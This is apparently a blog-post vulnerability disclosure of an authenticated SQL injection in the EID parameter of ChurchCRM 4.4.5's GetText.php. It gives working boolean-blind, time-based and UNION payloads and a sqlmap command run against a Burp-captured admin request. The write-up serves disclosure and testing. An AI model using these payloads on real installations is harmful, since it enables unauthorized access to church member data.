ChurchCRM 4.4.5 — SQL Injection at GetText.php

GrimTheRipper
2 min read · Jul 11, 2022

Vulnerability Explanation:

ChurchCRM 4.4.5 contains a SQL injection vulnerability in the EID parameter of /churchcrm/GetText.php. The parameter is reachable after logging in (the reproduction below uses an admin account), and sqlmap confirms boolean-based blind, time-based blind and UNION-based injection against it.

Affected Component:

http://ip_address:port/churchcrm/GetText.php?EID=2

Payload (sqlmap output for the EID parameter):

Parameter: EID (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: EID=2 AND 5131=5131

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: EID=2 AND (SELECT 8794 FROM (SELECT(SLEEP(5)))vcYY)

    Type: UNION query
    Title: Generic UNION query (NULL) - 13 columns
    Payload: EID=-8266 UNION ALL SELECT CONCAT(0x716a626a71,0x4f4247535a686a694a597a48694d4e6c76515974547872624f6b4d6642564f764752694c7461526b,0x7176767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -

Tested on:

  1. ChurchCRM Version 4.4.5 https://github.com/ChurchCRM/CRM/releases/tag/4.4.5

Steps to attack:

1. Log in with admin credentials.

2. Go to “Events”, as shown in the picture, and click “List Church Events”.

3. Click “Sermon Text”.

4. We’ll find /churchcrm/GetText.php?EID=2.

5. Refresh the page and intercept the request with Burp.

6. Save the intercepted request to a text file (GetText.req).

7. Run sqlmap against that file, restricting testing to the EID parameter. Because -r replays the raw request, the session cookie captured in step 5 is sent with every probe, so the authenticated endpoint stays reachable:

sqlmap -r GetText.req -p EID

8. We discovered a SQL injection vulnerability via the EID parameter.
